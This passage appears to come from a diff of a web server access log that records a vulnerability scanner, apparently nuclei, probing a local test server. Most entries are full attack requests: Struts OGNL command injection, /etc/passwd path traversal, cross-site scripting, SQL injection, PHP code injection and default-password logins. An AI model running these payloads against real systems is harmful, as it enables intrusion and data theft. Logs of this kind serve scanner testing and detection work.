(Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.146","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.771","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.228","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.401","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.299","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.417","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.698","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.698","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.417","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /ZMC_Admin_Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?action=stream HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.322","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.092","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.612","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.818","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /configuration.php-dist HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /status HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.254","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.579","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.724","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:19 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.154","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) 